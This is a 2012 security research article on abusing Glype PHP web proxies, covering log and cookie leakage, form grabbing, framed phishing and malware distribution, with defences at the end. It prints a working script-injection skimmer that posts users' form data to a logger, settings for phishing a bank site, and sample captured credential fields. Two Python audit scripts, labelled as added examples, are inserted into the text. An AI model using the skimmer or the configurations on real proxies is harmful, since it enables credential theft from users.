Abusing Glype Proxies - Attacks, Exploits and Defences
1. FEATURE
8
Network Security December 2012
Abusing Glype proxies: attacks, exploits and defences
Aditya K Sood, Michigan State University, Peter Greko, SecNiche Security Labs, and Richard J Enbody, Michigan State University

Proxies play a critical privacy role because they are widely used for anonymous surfing and identity cloaking on the Internet. In addition, proxies also assist in traffic filtering, traffic management, log auditing, access policies and surfing restricted sites. There are several types of proxies available, but the Glype HTTP proxy is used extensively.1

Glype is an open source proxy written in PHP and is freely available for personal use. It can also be licensed for commercial use, and is available as an add-on for Firefox as Proxilla.2 The basic idea of a web proxy is to download requested web pages, modify them according to a set of proxy rules, and then forward them to the user. By standing between the user and the rest of the web, the proxy can provide some anonymity to the user in addition to other services.

Proxies can also be transformed into attack platforms for exploitation. For example, misconfigured proxies can be exploited by an attacker to steal sensitive information from users. Our study focuses on various attacks and the distribution of malware using Glype proxies. We present a model of the approach used by attackers to transform a Glype proxy into an attack toolkit for spreading infections. For our experiments, we have used Glype versions 1.1 and 1.4. We present details about the features of Glype proxies that help attackers, and we conclude by proposing countermeasures.

Background
A number of studies have been conducted in the past regarding the use of public proxies as attack platforms. SANS, a co-operative research and security institution, conducted two studies on the integrity of public proxies. The first, by Powers, discussed the possibility of malware in public proxy lists.3 The study focused on tracking the Koobface malware, which used open ports for incoming connections and hid its operations behind proxies drawn from proxy lists. The other, by Brozycki, presented techniques for detecting proxies that provide anonymous access and proposed methods to defend against them using blacklisting and active monitoring.4 Brozycki also proposed a number of IDS rules to prevent users from accessing blocked content inside a network. In this paper, we do not cover network-level anonymisers such as VPNs and TOR. The concept of this paper revolves around web-based anonymity using server-side web proxies. The primary difference between the TOR network and web-based proxies is that TOR implements multi-tier (multi-layer) anonymity before forwarding the traffic to the destination, whereas web proxies have a two-tier (single-server) architecture.5 In other words, the difference lies in the implementation of relays and the routing of traffic between endpoints.
Huang et al discussed cache-poisoning attacks on transparent proxies using socket Application Programming Interfaces (APIs) in Java and Flash.6 In cache-poisoning attacks, the transparent proxies exploited are those configured to route traffic based on the HTTP ‘Host:’ header while caching at the same time. An attacker poisons the Host: header in the cache using a malicious Flash or Java file that downloads the policy file from the attacker’s server. Cache-poisoning attacks are quite common in network proxies. The Swiss Security Team discussed the inability of Glype proxies to hide the user’s identity entirely.7 Its study showed how misconfiguration of Glype proxies can lead to the disclosure of sensitive information.
Dissecting Glype
The primary purpose of the Glype proxy is to provide the capability of anonymous surfing. However, attackers can also transform a Glype proxy into a malware infection platform. To understand the attacks, it is important to understand the characteristics of Glype proxies.

To provide proxy services, each URL and each page’s internal links are encoded using a simple base-64 encoding. For example, consider this URL:

hxxp://[Glype_proxy_url]/proxy/browse.php?u=Oi8vc2NyaXB0bWFmaWEub3JnLw%3D%3D&b=13&f=norefer

This contains the string ‘Oi8vc2NyaXB0bWFmaWEub3JnLw’. A simple base-64 decoding of this string results in ‘://scriptmafia.org’, which shows that the URL decoding process is simple. Care is needed to handle special characters because the Glype proxy follows the PHP-based encoding/decoding mechanism in which special characters present in variable names are encoded to maintain compatibility with registered global variables.

The Glype proxy can be extended using plugins. For example, popular websites such as Facebook, Twitter and Gmail have separate plugins for the Glype proxy. Web page processing is handled by Glype’s ‘process.php’ page. For simplicity, the Glype proxy injects JavaScript code into web pages to avoid sending requests to the process.php page using HTTP POST requests. The Glype proxy uses HTTP headers such as ‘Referer:’ and ‘Location:’ for redirection purposes.

Google can be used to search for misconfigured Glype proxies. By default, Glype logs its activities to a log folder in the /tmp directory (/tmp/log). Knowing the location of the log allows a malicious user to easily craft efficient Google queries (Google dorks) to search for misconfigured proxies.

The Glype proxy has default credentials {username=admin, password=admin}. The password is hardcoded as an MD5 hash, but is susceptible to brute-force attack. For secure configurations, the hash should be replaced. In addition, in its default configuration, the Glype proxy uses no cache. Listing 1 shows the implementation of the cache module in the Glype proxy. However, it is still possible to configure the Glype proxy to send some cache headers using session_cache_limiter(‘private_no_expire’).

Glype proxies suffer from several design flaws that are exploited by attackers. Some of the issues that make Glype proxies an effective hacker tool are discussed below.
Logging mechanism
By design, the Glype proxy is supposed to provide anonymity for its users. Unfortunately, weaknesses exist that can leak information about a user’s identity. Since Glype is written in PHP, an attacker can make several modifications to turn the Glype proxy into a tool for the successful execution of attacks. There are different kinds of information that attackers can easily steal by misconfiguring the parameters of the Glype proxy and writing an advanced plugin for capturing data. Listing 2 shows the type of information logged when the user surfs a website through a Glype proxy. It basically captures GET requests, recording the client IP address alongside each URL visited.
Listing 1: Cache module in the Glype proxy
# Send no-cache headers.
function sendNoCache()
{
    header( 'Cache-Control: no-store, no-cache, must-revalidate' );
    header( 'Cache-Control: post-check=0, pre-check=0', false );
    header( 'Pragma: no-cache' );
}

Listing 2: Logs in the Glype proxy
68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com
68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png
68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=8
68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png
68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr

Glype proxies also allow attackers to extract cookies – a potentially valuable source of personal information. The Glype proxy only provides an option for deleting cookies on the client side, not on the server side. To provide anonymity the cookies should be deleted completely on both sides, but this cannot happen. Listing 3 shows the extracted cookies of a user who visited Facebook.

In an attempt to provide anonymity, a Glype proxy does not log POST requests. However, an attacker can write a plugin to grab all POST requests. We developed such a plugin, which we demonstrate in the next section.
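As an added example (not code from the article or from Glype), the following Python recovers the destination hidden in a browse.php link, as described above under ‘Dissecting Glype’, and parses log lines in the layout of Listing 2 to show what a leaked log exposes per client IP. The proxy host name and the log lines are constructed, and the ‘b’ and ‘f’ parameters are assumed to have unknown meaning and are passed through unchanged.

```python
"""Added example (not Glype's own code): decode Glype browse.php links and audit
what a Glype-style log (the layout of Listing 2) reveals. Inputs are constructed."""
import base64
import binascii
import re
from datetime import datetime
from urllib.parse import parse_qs, unquote, urlsplit


def decode_glype_target(browse_url):
    """Return the destination carried in the 'u' parameter of a browse.php link.

    Glype base64-encodes the proxied URL (the article decodes
    'Oi8vc2NyaXB0bWFmaWEub3JnLw' to '://scriptmafia.org'). 'b' and 'f' are
    returned as found: their semantics are not described on the page."""
    _, _, query = browse_url.partition("?")
    params = parse_qs(query, keep_blank_values=True)
    # parse_qs turns '+' into ' '; a space cannot occur in base64, so undo that
    encoded = unquote(params.get("u", [""])[0]).replace(" ", "+")
    encoded += "=" * (-len(encoded) % 4)  # tolerate padding stripped by a client
    try:
        target = base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        target = None  # not a Glype-style link, or a tampered parameter
    return {"target": target, "b": params.get("b", [None])[0], "f": params.get("f", [None])[0]}


LOG_LINE = re.compile(r"^(?P<ip>[^,\s]+),\s*(?P<ts>[^,]+),\s*(?P<url>\S+)$")
TOKEN_PARAM = re.compile(r"sess|token|sid|auth", re.I)  # names that look like session material


def parse_glype_log(lines):
    """Parse 'client IP, timestamp, URL' lines; malformed lines are skipped."""
    events = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append({"ip": m["ip"], "time": when, "url": m["url"]})
    return events


def exposure_report(events):
    """Per client IP: hosts visited, first/last sighting and any query parameters
    that look like session tokens. This is what a leaked log hands to its reader."""
    report = {}
    for ev in events:
        entry = report.setdefault(
            ev["ip"], {"hosts": set(), "first": ev["time"], "last": ev["time"], "tokens": []}
        )
        entry["first"] = min(entry["first"], ev["time"])
        entry["last"] = max(entry["last"], ev["time"])
        parts = urlsplit(ev["url"])
        entry["hosts"].add(parts.netloc)
        for name, values in parse_qs(parts.query).items():
            if TOKEN_PARAM.search(name):
                entry["tokens"].append((name, values[0]))
    return report


# Constructed sample in the Listing 2 layout (documentation addresses, made-up token).
SAMPLE_LOG = """\
198.51.100.23, 07/Mar/2012:21:15:54 -0500, http://m.example-social.net
198.51.100.23, 07/Mar/2012:21:16:14 -0500, https://m.example-social.net/login.php?m=m&refid=8
198.51.100.23, 07/Mar/2012:21:17:03 -0500, http://m.example-social.net/home.php?refid=9&m_sess=CONSTRUCTED1&_rdr
203.0.113.9, 07/Mar/2012:21:20:41 -0500, http://www.example.org/
this line is not in the log format and is skipped
""".splitlines()

if __name__ == "__main__":
    link = "http://proxy.example.net/proxy/browse.php?u=Oi8vc2NyaXB0bWFmaWEub3JnLw%3D%3D&b=13&f=norefer"
    print(decode_glype_target(link))
    for ip, entry in exposure_report(parse_glype_log(SAMPLE_LOG)).items():
        print(ip, sorted(entry["hosts"]), entry["tokens"], entry["last"] - entry["first"])
```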
IP banning and restriction
Glype proxies provide impressive functionality to restrict IP addresses using the BlockScript web software.8 It was designed to enable administrators to restrict HTTP requests from unwanted domains. However, this functionality is also useful for launching targeted attacks in which attackers target a specific set of IP addresses and restrict others. Also, this property can subvert the generic method of analysing servers remotely: an analyst connecting from a banned address sees only the ban page. A Glype proxy uses an IP banning module as shown in Listing 4.

In the code in Listing 4, a Glype proxy looks for IP addresses that are restricted or blacklisted to start the verification check. If an IP address is found in the databases, the Glype proxy returns a ‘403 Forbidden’ response to the user. To make it more malicious, attackers can serve malicious web pages showing the IP-banned message. In this way, a user is not able to surf anonymously and still gets infected. There are many modifications that can be made in the code for playing around with IP address restrictions.
Listing 3: Cookies collected by the Glype proxy
#HttpOnly_.facebook.com TRUE / FALSE 1394475951 datr V4tbT71wsBGdD8j2XZgUBDlJ
.facebook.com TRUE / FALSE 0 lsd 1W12c
#HttpOnly_.facebook.com TRUE / FALSE 0 m_ts 1331403951
.facebook.com TRUE / FALSE 1 reg_ext_ref deleted
.facebook.com TRUE / FALSE 0 reg_fb_gate http%3A%2F%2Fm.facebook.com%2F
.facebook.com TRUE / FALSE 0 reg_fb_ref http%3A%2F%2Fm.facebook.com%2F%2522http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyr%2Fr%2FxgDlevwA9Y5.png%2522

Listing 4: IP banning module
if ( empty($_SESSION['ip_verified']) || $_SESSION['ip_verified'] != $_SERVER['REMOTE_ADDR'] ) {
    if (!$CONFIG['enable_blockscript']) {
        # Current IP matches a banned IP? true/false
        $banned = false;
        # Examine all IP bans
        foreach ( $CONFIG['ip_bans'] as $ip ) {
            # Is this a range or single?
            if ( ($pos = strspn($ip, '0123456789.')) == strlen($ip) ) {
                # Just a single IP so check for a match
                if ( $_SERVER['REMOTE_ADDR'] == $ip ) {
                    # Flag the match and break out the loop
                    $banned = true;
                    break;
                }
                # And try next IP
                continue;
            }
            // - - - - - Redacted - - - - - //
        }
        # Is the IP address banned?
        if ( $banned ) {
            # Send a Forbidden header
            header('HTTP/1.1 403 Forbidden', true, 403);
            # Print the banned page and exit!
            echo loadTemplate('banned.page');
            exit;
        }
    }
    # Still here? Must be OK so save IP in session to prevent rechecking next time
    $_SESSION['ip_verified'] = $_SERVER['REMOTE_ADDR'];
}
Threat model
Examining the threat model allows us to understand the role of the various actors involved and how attackers exploit the integrity of users by conducting attacks. The model basically covers the threats associated with end users and administrators. Since we’re concerned here with the Glype proxy, the attacks are modelled around the Man-in-the-Middle (MitM) paradigm.

- During our research, it was noticed that Glype proxies are configured in a very insecure way – for example, using default or weak passwords. This misconfiguration allows attackers to successfully compromise the proxy software using brute-force attacks. The primary risk is that attackers then exploit third-party resources – including infrastructure, traffic density, etc – to exploit users on a large scale. Glype is a server-side proxy and compromising it has serious implications.
- The Glype proxy provides anonymity on the web, and its users are susceptible to a wide variety of attacks. The primary aim of the attacker is to force users to surf Internet resources through the Glype proxy. The users’ surfing habits and trust play a significant role in the execution of insidious attacks. Information stealing, phishing, Cross-Frame Scripting (XFS) and so on are some of the attacks that can be triggered easily using a Glype proxy.

Since the Glype proxy is open source, the code can be modified using inherent features that make it a more powerful weapon. In the next section, we discuss some of the attacks using custom plugins. Remember, Glype is not a client-side proxy, but it infects and modifies the proxied web pages served to the users.
Launching attacks using Glype
Attacks triggered using Glype proxies are based on the concept of the Man-in-the-Middle (MitM) paradigm. The MitM agent reads and writes the traffic between two end points on the network. It is quite easy to equate the Glype proxy with an MitM agent because the traffic originating from the infected machine is routed through the Glype proxy interface before it is processed by the web server. The attacker controls and administers the Glype proxy interface and can easily manipulate the requests and responses flowing between the client’s browser and the web server. As a result, the user is served with illegitimate and malicious content that subverts the normal operations of browsers. To support this theory, our team conducted several sets of tests to understand the impact of Glype proxy infection on a large scale.
Data exfiltration – form grabbing
Data exfiltration attacks are conducted to steal sensitive information from infected machines on the Internet. It is easy to exfiltrate data from users who use Glype proxies. These proxies provide a configuration file for managing the current run state, and it appears possible for an attacker to infect all the proxified web pages with illegitimate content.

To test that theory, we conducted an experiment to understand the impact of infecting proxied web pages. We noticed that a Glype proxy provides certain configuration parameters that can be used to inject malicious content that gets rendered in all the web pages that are proxied. This capability can be devastating. We implemented a small program using jQuery to grab all the POST requests. Listing 5 provides the different scripts that we used in our tests, which are described as follows:

- Code (1) is used to serialise the data present in the forms. This code serialises the data entered by the users in input boxes in the forms and submits the data to the malicious domain. This code is passed as a parameter to the ‘footer_include’ configuration, and so injects this code at the bottom of all the proxied web pages.
- Code (2) is the same, except that it does not send the form data to the server but rather triggers an alert notification. This code is used for validating successful insertion of scripts in the web pages.
- Code (3) is used to handle the incoming data and store it in the log file for analysis.

By using the code discussed in Listing 5, it is possible to log all the POST requests sent by the user’s browser through the Glype proxy’s interface. The POST data can be logged on the server side as shown in Listing 6.

Figure 1 shows the successful execution of a script inserted in the proxied web page. This shows that it is very easy to inject scripts automatically by tweaking configuration parameters in the Glype proxy.
Cross-frame scripting and phishing
Cross-Frame Scripting (XFS) is an advanced attack in which an attacker exploits the inability of web pages to prevent themselves from being framed in a web browser. An attacker loads the target website in an HTML iframe or frame and forces the JavaScript from the primary domain to interact with the target website that is loaded in the frame. XFS allows attackers to force a legitimate user to perform rogue operations without their knowledge. XFS can be launched to trigger phishing attacks. To counter this attack many websites are using anti-XFS code.9 HTML 5 has the built-in attribute ‘sandbox’, defined as part of the iframe tag, that can be used to bypass the restrictions, as described here.10 Despite this fact, a Glype proxy has the ability to rewrite URLs while proxying the content of the domain. A Glype proxy caches the URL and then applies the proxify function to rewrite it. To make it look legitimate, an attacker can configure the Glype proxy in such a way that phishing attacks look more original by subverting the XFS protections. We conducted an experiment using Glype proxy version 1.1 and made configuration changes in the settings.php file in order to tweak the Glype proxy to execute a phishing attack. We also modified the code to execute advanced attacks to understand the potential risk associated with a Glype proxy. Listing 7 shows the configuration we used in the demonstration attack code.

In our code, Secure Sockets Layer (SSL) protocol warnings are turned off. This modification allows the Glype proxy to quash all the SSL-based warnings. We also enabled hotlinking, the process of directly loading content from a third-party domain. In a Glype proxy, hotlinking allows the attacker to force the user to visit an XFS web page directly. We enabled caching for faster execution. Caching of files such as CSS, images, and so on forces the browser to store the content locally and use it directly without sending requests to the web server. This way, the attacker can speed up the loading of web pages in the client’s browser. Finally, we allowed JavaScript for communication with different objects on the web page. JavaScript is an essential component of many websites and applications. For example, banking websites use JavaScript for communicating with different objects in a dynamic manner. In addition, the attacker benefits from this because it allows the attacker to execute any arbitrary script in the context of a proxied website. We tested this configuration and found that it is possible to use XFS for conducting a phishing attack, as shown in Figure 2.

Our experiment showed that sophisticated XFS protections can be circumvented with the help of a Glype proxy. In Figure 2, a legitimate Bank of America website is framed inside a Glype proxy interface without any warnings. It means an attacker can inject scripts as discussed earlier to interact with various objects on the web page. Typically, the user believes that he/she is surfing the bank website through a legitimate proxy, but in reality all the information can be easily captured from the user’s session.
In the above layout, the URL points to the domain where the Glype proxy is hosted. As hotlinking is allowed and the Glype proxy does not present any message, the attacker can also use the Glype proxy URL (pointed at the bank domain) and embed it in phishing emails for distribution among a large number of users. When a user clicks the malicious link, he/she is redirected to the Glype proxy interface, which automatically loads the legitimate bank website. An attacker can also install a Glype proxy on familiar-looking domain names to make the phishing attack look more appealing, and hence more effective.

Listing 5: Injecting code in a Glype proxy parameter
// - - - - Code (1) - - - - //
$CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script>
$(\'form\').submit( function()
{
    var yup = $(\'form\').serialize();
    $.post("logit.php", yup, function (data){});
});
</script>';

// - - - - Code (2) - - - - //
$CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script>
$(\'form\').submit( function()
{
    alert( $(\'form\').serialize() );
});
</script>';

// - - - - Code (3) - - - - //
<?php
$file = fopen("postlog.txt", 'a');
foreach ( $_POST as $key => $value )
{
    fwrite($file, $key . ":" . $value . "\n");
}
fclose($file);
?>

Listing 6: Extracted data from an HTTP POST (form submit) request
lsd:
post_form_id:7eb4ce3be4f996e756e1f54ac474d578
charset_test:€,´,€,´,水,Д,Є
version:1
ajax:1
width:1280
pxr:1
gps:1
email:FACEBOOK_USER@facebook.com
pass:FACEBOOK_PASSWORD
m_ts:1332258635
li:MqdoT8wNn91Ak0OT4rUUGUHg
Malware distribution
Glype proxies can be used for attacking corporate networks to spread infections. Considering the characteristics of a Glype proxy, it is possible for attackers to create an embedded toolkit using a Glype proxy for distributing malware that is highly targeted. The complete model is presented below.
Hosting Glype proxy: to begin, the attacker hosts the Glype proxy tool on a compromised domain. As described earlier, web searching can reveal a number of misconfigured Glype proxies on the Internet. It is not difficult for an attacker to hack a misconfigured proxy and use it for malicious purposes. Once a proxy is successfully installed on the compromised domain, the attacker configures it for the attack using scenarios described in earlier sections. There are two primary configuration checks that an attacker wants to implement:

- Logging: this allows the attacker to keep track of the activity happening through the proxy. For example, an attacker can install a custom POST logger plugin for stealing data in HTTP POST requests.
- IP banning: this allows the attacker to restrict certain IP addresses from accessing the Glype proxy. This functionality is useful in targeted infections.

Embedding a browser exploit pack in Glype: after successful installation of a Glype proxy, the next step is to embed an iframe having a URL pointing to a Browser Exploit Pack (BEP).11 The iframe can be hidden or obfuscated depending on the requirements. A BEP is a framework that has a number of exploits bundled together. A BEP begins by fingerprinting the user’s browser environment and then serves an appropriate exploit. BlackHole, Phoenix and Crimepack are some of the BEPs that are frequently used for infections. It is possible to embed a single exploit code directly in the Glype proxy web page. This process actually transforms the Glype proxy into an attack toolkit. As discussed earlier, malicious code can be injected dynamically in all the proxied web pages for stealthy infections. The main motive behind this process is to exploit the user’s browser when a proxied web page is opened. Additionally, many proxy users believe that surfing online anonymously provides security and neglect to verify the integrity of the Glype proxy. An attacker can exploit this trust. Embedding a malicious link pointing to a BEP is not a hard task in the Glype proxy.

Figure 1: Stealing credentials by injecting code in a Glype proxy.

Listing 7: Configuration parameters required for bypassing XFS and executing phishing
// Configure SSL warnings
$CONFIG['ssl_warning'] = false;
// Managing hotlinking
$CONFIG['stop_hotlinking'] = false;
// Specifying the target domain for hotlinking
$CONFIG['hotlink_domains'] = array('www.bankofamerica.com');
// Storing cookies on the server
$CONFIG['cookies_on_server'] = true;
// Setting cookies path
$CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
// Enable logging
$CONFIG['enable_logging'] = true;

Figure 2: Phished web page in a Glype proxy.
Advertising Glype proxy: once the Glype proxy-based attack is set up, the next step is to start advertising the Glype proxy. Advertising is usually done to collect revenue based on hits, but in this case the prime motivation for an attacker is to get traffic so that the infectious code can be distributed. However, advertising can play a critical role in the success of attacks. Several methods are used by attackers to advertise their infected Glype proxies:

- Attackers use public proxy lists to advertise their infected Glype proxy. Public proxy lists are one of the most widely accepted methods for advertising Glype proxies. For example, paying a few dollars allows an infected Glype proxy to be numbered among the top-ten proxies, which is a good deal from the attacker’s perspective. This approach can increase traffic on the infected Glype proxy. Figure 3 shows how a proxy can be advertised.
- Attackers use phishing attacks to distribute the URL pointing to their infected Glype proxy. Phishing attacks have been effective for exploiting users’ trust and belief in the security of proxies.
- Attackers advertise the infected proxy on social networks, message boards and advertising links. Due to their popularity and trustworthiness, social networks have become the preferred choice of attackers for distributing malware. It is easy and profitable.

On completion of this process, attackers have successfully distributed information about their infected Glype proxy to a variety of outlets on the Internet. After this, the attacker waits for the infections to trigger.

Post-exploitation: once the infected proxy site has been visited, there are two vectors of attack. If a user is directed to a malicious website loaded with malware, the BEP there installs malware on the user’s computer and the computer is owned by the attacker. If the Glype proxy is being used to gather information, the attacker starts mining the logs to track the IP addresses and extract personal information, possibly including account credentials. Information collected from Glype proxies can also be very useful for designing other attack vectors. For example, information specific to an individual can be collected for a later, more effective spear-phishing attack. This attack model is typically part of a distributed attack and can be very effective in spreading infections widely.
Proactive steps
There are several steps that users can take when dealing with Glype proxies for anonymous surfing on the Internet:

- Users should avoid using public proxy services for surfing websites that require critical information, such as financial credentials, to be delivered to the server. Users should be aware that their data is being transferred through a public proxy. A classic example would be employees circumventing restrictions put in place by the organisation they work for – such circumvention could open a big hole.
- There are legitimate and authentic proxy services on the Internet. However, it is still not advised to use the services directly. A user should verify the integrity of a proxy provider to check whether it is a legitimate service provider or a fraudulent entity.
- If an organisation deploys a Glype proxy for internal use, it should be ensured that the Glype proxy is configured in a secure way. Default credentials must be changed to stronger ones. Log files should not be publicly accessible, which can be achieved by configuring the settings.php and .htaccess files on the server.
- Users should develop good surfing habits on the Internet. For example, they should always think twice before clicking a link that is embedded in an email. Additionally, they should be suspicious of attachments and verify them before downloading. These operational habits depend on the security knowledge of the user and show the importance of user education. Organisations should have a robust security training model to educate users about the latest web attack trends and appropriate secure behaviour.

The steps discussed above can be effective in reducing the infection rate and preserving the integrity of users.
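As an added example (not Glype's code), this Python script audits a settings.php for the weak settings discussed in this article and in the proactive steps above. It assumes the $CONFIG['key'] = value; layout of Listing 7, uses only key names that appear on the page plus one hypothetical key name for the admin password hash, and relies on the article's statement that the default password is stored as an MD5 hash of ‘admin’; the two configurations it checks are constructed samples.

```python
"""Added example (not Glype's own code): audit a Glype settings.php for the
settings this article shows attackers relying on. It assumes the
$CONFIG['key'] = value; layout of Listing 7 and uses only key names from the
page, plus one hypothetical key name for the admin password hash."""
import re

# md5('admin'): the article states the default admin/admin credential is stored
# as an MD5 hash, so this digest surviving in the file means it was never changed.
DEFAULT_ADMIN_HASH = "21232f297a57a5a743894a0e4a801fc3"

# One $CONFIG assignment: the value runs to the first ';' that ends a line
# (optionally followed by a // or # comment). Deliberately simple, not a PHP
# parser; enough for booleans, arrays and the opening <script> of an include.
ASSIGN = re.compile(
    r"\$CONFIG\[['\"](?P<key>\w+)['\"]\]\s*=\s*(?P<value>.*?);[ \t]*(?:(?://|#)[^\n]*)?$",
    re.M | re.S,
)

# key, test on the lower-cased value text, finding id, remediation
CHECKS = [
    ("ssl_warning", lambda v: v == "false", "ssl_warning_off",
     "set ssl_warning = true so certificate problems are shown to users"),
    ("stop_hotlinking", lambda v: v == "false", "hotlinking_allowed",
     "set stop_hotlinking = true so proxy links cannot be dropped straight into phishing mail"),
    ("cookies_on_server", lambda v: v == "true", "cookies_on_server",
     "set cookies_on_server = false so user cookies are not retained on the proxy"),
    ("enable_logging", lambda v: v == "true", "logging_enabled",
     "disable logging, or keep the log folder outside the web root and deny access in .htaccess"),
    ("footer_include", lambda v: "<script" in v, "script_in_footer_include",
     "remove the script: footer_include is rendered into every proxied page"),
]


def parse_config(php_source):
    """Map each $CONFIG key to the raw text of its value (last assignment wins)."""
    return {m["key"]: m["value"].strip() for m in ASSIGN.finditer(php_source)}


def audit_glype_settings(php_source):
    """Return sorted (finding_id, remediation) pairs for the weak settings present."""
    config = parse_config(php_source)
    findings = [(finding, fix) for key, weak, finding, fix in CHECKS
                if key in config and weak(config[key].lower())]
    if DEFAULT_ADMIN_HASH in php_source.lower():
        findings.append(("default_admin_hash",
                         "replace the admin/admin MD5 hash with the hash of a strong, unique password"))
    return sorted(findings)


# Constructed sample: Listing 7's values, the injected footer from Listing 5 and
# the unchanged default hash under a hypothetical key name.
WEAK_SETTINGS = r"""<?php
// hypothetical key name; not taken from the page
$CONFIG['admin_password_hash'] = 'HASH_PLACEHOLDER';
$CONFIG['ssl_warning'] = false;
$CONFIG['stop_hotlinking'] = false;
$CONFIG['hotlink_domains'] = array('www.bankofamerica.com');
$CONFIG['cookies_on_server'] = true;
$CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
$CONFIG['enable_logging'] = true;
$CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script>
$(\'form\').submit( function() { var yup = $(\'form\').serialize(); $.post("logit.php", yup, function (data){}); });
</script>';
""".replace("HASH_PLACEHOLDER", DEFAULT_ADMIN_HASH)

# Constructed sample: the same keys with the hardened values.
HARDENED_SETTINGS = r"""<?php
$CONFIG['admin_password_hash'] = 'REPLACED_WITH_HASH_OF_A_STRONG_PASSWORD';  // hypothetical key name
$CONFIG['ssl_warning'] = true;
$CONFIG['stop_hotlinking'] = true;
$CONFIG['cookies_on_server'] = false;
$CONFIG['enable_logging'] = false;
$CONFIG['footer_include'] = '';
"""

if __name__ == "__main__":
    for finding, fix in audit_glype_settings(WEAK_SETTINGS):
        print(f"{finding}: {fix}")
    print("hardened:", audit_glype_settings(HARDENED_SETTINGS))
```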
Conclusion
Glype proxies have been increasing in popularity over the past few years. Generally, Glype proxies assist in maintaining a user’s integrity and privacy. However, they can also be used as an attack platform because of some inherent design flaws. First, insecure configuration of Glype proxies can result in the stealing of information. Second, attackers can extend the Glype proxy code to conduct web-based attacks by tricking a user into visiting a malicious domain or routing the web traffic through Glype proxies. Finally, security greatly depends on users’ ability to make secure decisions when on the Internet. Secure behaviour can help thwart a number of attack scenarios. Be vigilant and surf securely.

Figure 3: Advertising proxies on the Internet.
About the authors
Aditya K Sood is a senior security practitioner and PhD candidate at Michigan State University. He has already worked in the security domain for Armorize, COSEINC and KPMG. He is also a founder of SecNiche Security, an independent security research lab. He has been an active speaker at industry conferences such as DEFCON, HackInTheBox, LayerOne, Source, RSA, BruCon, ToorCon, HackerHalted, TRISC, EuSecwest, XCON, Troopers, OWASP AppSec, US-CERT GFIRST and many others. He has authored several papers for various publishers including IEEE, Elsevier, Crosstalk, Virus Bulletin, ISACA, ISSA and HITB.

Peter Greko is a security researcher at SecNiche Security Labs where he deals with cyber-security issues. Previously he has worked in the cyber-security divisions of Sypris and Citigroup. He has spoken at several conferences, including HackerHalted, AppSec DC, HOPE, Swiss CyberStorm and local OWASP and ISSA chapter meetings.

Richard J Enbody, PhD is associate professor in the Department of Computer Science and Engineering at Michigan State University (US) where he joined the faculty in 1987. He earned his PhD at the University of Minnesota (1987) and his BA at Carleton College (1976). His research interests include computer security, computer architecture, web-based distance education, and CS1 education. Enbody has written a CS1 text using Python: ‘The Practice of Computing Using Python, Second Edition’, published by Addison-Wesley 2012.
References
1. Glype proxy. Accessed Nov 2012. www.glype.com.
2. Proxilla Glype Proxy Client – Mozilla Firefox Add-On. Accessed Nov 2012. https://addons.mozilla.org/en-US/firefox/addon/proxilla/.
3. Powers, JL. ‘Tracking Malware with Public Proxy Lists’. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/whitepapers/malicious/tracking-malware-public-proxy-lists_33604.
4. Brozycki, Z. ‘Detecting and Preventing Anonymous Proxy Usage’. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/whitepapers/detection/detecting-preventing-anonymous-proxy-usage_32943.
5. ‘TOR (The Onion Router)’. University of Michigan. Accessed Nov 2012. http://webapps.lsa.umich.edu/lsait/admin/TOR%20Routing%20Infomation%20.pdf.
6. Huang, L; Chen, EY; Barth, A; Rescorla, E; Jackson, C. ‘Talking to Yourself for Fun and Profit’. Accessed Nov 2012. www.w2spconf.com/2011/papers/websocket.pdf.
7. ‘When You Think You Surf Anonymously But You Don’t’. Swiss Security Blog, 26 Apr 2010. Accessed Nov 2012. www.abuse.ch/?p=2534.
8. BlockScript, home page. Accessed Nov 2012. www.blockscript.com.
9. Rydstedt, G; Bursztein, E; Boneh, D; Jackson, C. ‘Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites’. Stanford SecLab, 20 Jul 2010. Accessed Nov 2012. http://seclab.stanford.edu/websec/framebusting/framebust.pdf.
10. Sood, AK; Enbody, RJ. ‘Frametrapping the framebusting defence’. Network Security, October 2011. Accessed Nov 2012. www.sciencedirect.com/science/article/pii/S1353485811701052.
11. Sood, AK; Enbody, RJ. ‘Browser Exploit Packs – Exploitation Tactics’. ToorCon Security Conference, October 2011, San Diego. Accessed Nov 2012. http://secniche.blogspot.com/2011/06/toorcon-seattle-2011-browser-exploit.html.